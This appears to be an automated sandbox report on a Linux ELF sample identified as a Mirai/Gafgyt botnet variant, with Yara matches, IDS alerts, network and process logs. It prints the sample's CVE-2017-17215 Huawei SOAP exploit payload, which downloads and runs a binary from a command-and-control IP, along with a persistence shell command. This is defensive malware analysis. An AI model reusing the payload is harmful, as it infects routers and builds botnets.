          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: Process Memory Space: OMnylKuNNF.elf PID: 6227, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample: .symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engine, Classification label: mal96.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          Source: /bin/sh (PID: 6231), Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/systemd
          Source: /bin/sh (PID: 6230), Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6231), Chmod executable: /usr/bin/chmod -> chmod 777 bin/systemd
          Source: /tmp/OMnylKuNNF.elf (PID: 6233), File opened: /proc/6234/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6228), Shell command executed: sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
          Source: /bin/sh (PID: 6229), Rm executable: /usr/bin/rm -> rm -rf bin/systemd
          Source: submitted sample, Stderr: sh: 1: cannot create 2bin/systemd: Directory nonexistent; chmod: cannot access 'bin/systemd': No such file or directory: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          Source: unknown, Network traffic detected: HTTP traffic on port 54656 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 59102 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 59102
          Source: unknown, Network traffic detected: HTTP traffic on port 40346 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 39138 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 39138
          Source: unknown, Network traffic detected: HTTP traffic on port 39372 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 39372
          Source: unknown, Network traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 52978 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 52978
          Source: unknown, Network traffic detected: HTTP traffic on port 48276 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 48276
          Source: unknown, Network traffic detected: HTTP traffic on port 53290 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 55812 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 53290
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 55812
          Source: unknown, Network traffic detected: HTTP traffic on port 43698 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 49098 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 47544 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 47544
          Source: unknown, Network traffic detected: HTTP traffic on port 36620 -> 37215

          Stealing of Sensitive Information

          Source: Yara match, File source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara match, File source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara match, File source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | Path Interception | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          No configs have been found
          [Behavior graph, ID 831159. Sample: OMnylKuNNF.elf; start date: 21/03/2023; architecture: LINUX; score: 96. Process tree: OMnylKuNNF.elf starts sh (which starts chmod, rm and mkdir) and further OMnylKuNNF.elf processes. Network nodes: j.xnyidc.top, 197.213.188.40 (ZAIN-ZAMBIAZM, Zambia) and 99 other IPs or domains. Signatures shown: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Sets full permissions to files and/or directories; 5 other signatures.]
          Source | Detection | Scanner | Label | Link
          OMnylKuNNF.elf | 56% | ReversingLabs | Linux.Trojan.Gafgyt |
          OMnylKuNNF.elf | 58% | Virustotal | | Browse
          OMnylKuNNF.elf | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          j.xnyidc.top | 13% | Virustotal | | Browse
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          j.xnyidc.top | 156.224.24.249 | true | true | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/soap/encoding/ | OMnylKuNNF.elf | false | | high
          http://schemas.xmlsoap.org/soap/envelope/ | OMnylKuNNF.elf | false | | high
              No context
              No created / dropped files found
              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.274262520522586
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:OMnylKuNNF.elf
              File size:63296
              MD5:8406babfb9b432ee244575aa2e3f63fe
              SHA1:22761d5d5c43e0251bab907054066239a8f35b61
              SHA256:9a067e32dd6c25053c302de7caf61cdc0f3982289eb91d06c449fe08a47fc6d3
              SHA512:c2b9ac112b18050fb243b65a5b220d706c2100df0b55b93c6876f1623fee42c67696cd0fd855b4164aca9025174a2e386a6060f1f7bec96bef9b73e727fd6ba5
              SSDEEP:1536:dpmbSQ6U3q7cCBT/lZsK/0DiQNLiKimfFoktCe3fYRMD:WShU3q7cEDlCK/0D19i8Fok06fYRw
              TLSH:0B534B17B58280FDC09AC1744B2BBA3AD93775FD0378B2A677D0EB262CA6D211E1DD44
              File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................P.......P.............................Q.td....................................................H...._....:...H........

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:
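              Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
               | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
              .init | PROGBITS | 0x4000e8 | 0xe8 | 0x13 | 0x0 | 0x6 | AX | 0 | 0 | 1
              .text | PROGBITS | 0x400100 | 0x100 | 0xc866 | 0x0 | 0x6 | AX | 0 | 0 | 16
              .fini | PROGBITS | 0x40c966 | 0xc966 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 1
              .rodata | PROGBITS | 0x40c980 | 0xc980 | 0x2390 | 0x0 | 0x2 | A | 0 | 0 | 32
              .ctors | PROGBITS | 0x50f000 | 0xf000 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
              .dtors | PROGBITS | 0x50f010 | 0xf010 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
              .data | PROGBITS | 0x50f040 | 0xf040 | 0x440 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .bss | NOBITS | 0x50f480 | 0xf480 | 0x2a10 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .shstrtab | STRTAB | 0x0 | 0xf480 | 0x3e | 0x0 | 0x0 |  | 0 | 0 | 1

              Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
              LOAD | 0x0 | 0x400000 | 0x400000 | 0xed10 | 0xed10 | 6.4016 | 0x5 | R E | 0x100000 |  | .init .text .fini .rodata
              LOAD | 0xf000 | 0x50f000 | 0x50f000 | 0x480 | 0x2e90 | 2.1644 | 0x6 | RW | 0x100000 |  | .ctors .dtors .data .bss
              GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |  | 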
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              03/21/23-07:11:34.483333 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 55812 | 37215 | 192.168.2.23 | 197.39.195.63
              03/21/23-07:10:23.199102 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 40346 | 37215 | 192.168.2.23 | 197.234.59.53
              03/21/23-07:11:56.415741 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 36620 | 37215 | 192.168.2.23 | 147.46.122.92
              03/21/23-07:10:55.747017 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 52978 | 37215 | 192.168.2.23 | 41.233.131.219
              03/21/23-07:09:52.583756 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 54536 | 53 | 192.168.2.23 | 8.8.8.8
              03/21/23-07:11:48.637846 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 47796 | 156.224.24.249 | 192.168.2.23
              03/21/23-07:10:30.344361 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39138 | 37215 | 192.168.2.23 | 41.36.213.188
              03/21/23-07:10:07.047772 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 59102 | 37215 | 192.168.2.23 | 197.39.34.188
              03/21/23-07:10:54.644031 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 58844 | 37215 | 192.168.2.23 | 86.69.66.253
              03/21/23-07:09:59.757322 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 54656 | 37215 | 192.168.2.23 | 157.157.112.175
              03/21/23-07:11:38.525358 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 43698 | 37215 | 192.168.2.23 | 172.65.204.144
              03/21/23-07:11:01.870921 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 48276 | 37215 | 192.168.2.23 | 197.39.190.244
              03/21/23-07:11:51.897568 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 47544 | 37215 | 192.168.2.23 | 41.62.43.160
              03/21/23-07:10:39.495843 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39372 | 37215 | 192.168.2.23 | 197.39.167.71
              03/21/23-07:11:41.620198 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 49098 | 37215 | 192.168.2.23 | 197.148.89.120
              03/21/23-07:09:52.816652 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 47796 | 56999 | 192.168.2.23 | 156.224.24.249
              03/21/23-07:11:34.410258 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 53290 | 37215 | 192.168.2.23 | 213.176.10.176
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Mar 21, 2023 07:09:52.583755970 CET | 192.168.2.23 | 8.8.8.8 | 0xb28d | Standard query (0) | j.xnyidc.top | A (IP address) | IN (0x0001) | false

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Mar 21, 2023 07:09:52.602952957 CET | 8.8.8.8 | 192.168.2.23 | 0xb28d | No error (0) | j.xnyidc.top |  | 156.224.24.249 | A (IP address) | IN (0x0001) | false

              System Behavior

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:/tmp/OMnylKuNNF.elf
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/rm
              Arguments:rm -rf bin/systemd
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/mkdir
              Arguments:mkdir bin
              File size:88408 bytes
              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/chmod
              Arguments:chmod 777 bin/systemd
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe